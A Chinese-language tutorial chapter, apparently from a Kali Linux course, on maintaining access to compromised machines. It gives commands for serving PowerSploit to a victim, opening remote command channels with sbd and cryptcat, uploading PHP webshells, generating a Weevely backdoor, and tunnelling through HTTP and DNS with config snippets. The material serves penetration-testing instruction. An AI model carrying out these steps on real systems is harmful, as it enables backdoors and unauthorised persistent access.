Kali Linux - 保持访问



在本章中,我们将了解 Kali 用于维护连接以及在被入侵的机器连接和断开连接后仍然访问它的工具。

Powersploit

这是一个用于 Windows 机器上的工具。它在受害者的机器上安装了 PowerShell。此工具帮助黑客通过 PowerShell 连接到受害者的机器。

要打开它,请在左侧打开终端并键入以下命令进入 powersploit 文件夹:

cd /usr/share/powersploit/ 

如果你键入“ls”,它将列出所有 powersploit 工具,你可以在获得访问权限后下载并安装到受害者的机器上。大多数工具根据其名称进行自我解释。

Powersploit

在受害者的机器上下载此工具的一个简单方法是创建一个 Web 服务器,powersploit 工具允许使用以下命令轻松创建:

python -m SimpleHTTPServer 

Download Tool

之后,如果你键入:http://<Kali 机器 ip 地址>:8000/,结果如下。

Directory Listimg

Sbd

sbd 是一个类似于 Netcat 的工具。它是可移植的,可以在 Linux 和 Microsoft 机器上使用。sbd 特点是 AES-CBC-128 + HMAC-SHA1 加密。基本上,它有助于随时连接到受害者的机器上的特定端口并远程发送命令。

要打开它,请转到终端并键入“sbd -l -p 端口”以使服务器接受连接。

Connection Accept

在本例中,我们设置端口为 44,服务器将在该端口监听。

Case Port

在受害者的站点上,键入“sbd 服务器IP 端口”。将建立一个连接,我们可以在其中发送远程命令。

在本例中,它是“localhost”,因为我们在同一台机器上执行了测试。

Ipofserver

最后,在服务器上,您将看到连接已发生,如下面的屏幕截图所示。

Server Connection

Webshell

Webshell 可用于保持访问权限或入侵网站。但大多数会被杀毒软件检测到。C99 php shell 在杀毒软件中非常有名。任何常见的杀毒软件都会很容易地将其检测为恶意软件。

通常,它们的主要功能是通过 Web 界面发送系统命令。

要打开它,并在终端中键入“cd /usr/share/webshells/”

Webshell

如您所见,它们根据编程语言分为不同的类别:asp、aspx、cfm、jsp、perl、php。

如果进入 PHP 文件夹,您可以看到所有用于 php 网页的 webshell。

Folder

要将 shell 上传到 Web 服务器,例如“simple-backdoor.php”,请打开网页和 Web shell 的 URL。

最后,写入 cmd 命令。您将看到所有信息,如下面的屏幕截图所示。

Write Command

Weevely

Weevely 是一种 PHP webshell,可以模拟类似 telnet 的连接。它是一个用于 Web 应用程序后期利用的工具,可以用作隐蔽的后门或作为 Web shell 来管理合法的 Web 帐户,甚至免费托管的帐户。

要打开它,请转到终端并键入“weevely”,您可以在其中查看其用法。

Weevely

要生成 shell,请键入“weevely generate 密码 文件路径”。如以下屏幕截图所示,它在“桌面”文件夹中生成,并且该文件需要上传到 Web 服务器以获得访问权限。

Generate Shell

上传 Web shell 后,如以下屏幕截图所示,我们可以使用命令“weevely URL 密码”通过 cmd 连接到服务器,您可以在其中看到会话已启动。

Uploading File

http-tunnel

http-tunnel 创建一个通过 HTTP 请求进行隧道传输的双向虚拟数据流。如果需要,可以通过 HTTP 代理发送请求。这对于位于限制性防火墙后面的用户很有用。如果允许通过 HTTP 代理访问 WWW,则可以使用 http-tunnel 和 telnet 或 PPP 连接到防火墙外部的计算机。

首先,我们应该使用以下命令创建一个隧道服务器:

httptunnel_server –h 

然后,在客户端站点上键入“httptunnel_client –h”,两者都将开始接受连接。

dns2tcp

这又是一个隧道工具,可以帮助通过 DNS 流量(即 UDP 53 端口)传递 TCP 流量。

要启动它,请键入“dns2tcpd”。当您打开脚本时,将解释其用法。

DNSTcp

在服务器端,输入此命令配置文件。

#cat >>.dns2tcpdrc
<&l;END listen = 0.0.0.0 
port = 53 user=nobody 
chroot = /root/dns2tcp 
pid_file = /var/run/dns2tcp.pid 
domain = your domain key = secretkey 
resources = ssh:127.0.0.1:22 
END 
#dns2tcpd -f .dns2tcpdrc

在客户端端,输入此命令。

# cat >>.dns2tcprc 
<<END domain = your domain 
resource = ssh 
local_port = 7891 
key = secretkey 
END
# dns2tcpc -f .dns2tcprc 
# ssh root@localhost -p 7891 -D 7076 

隧道将使用此命令启动。

cryptcat

它是一个类似于 Netcat 的工具,允许以加密方式与受害者的机器建立 TCP 和 UDP 连接。

要启动一个服务器以监听连接,请键入以下命令:

cryptcat –l –p port –n 

cryptcat

其中,

  • -l 表示监听连接

  • -p 表示端口号参数

  • -n 表示不执行名称解析

在客户端站点上,连接命令是“cryptcat 服务器IP 服务器端口”

Port of Server
广告

© . All rights reserved.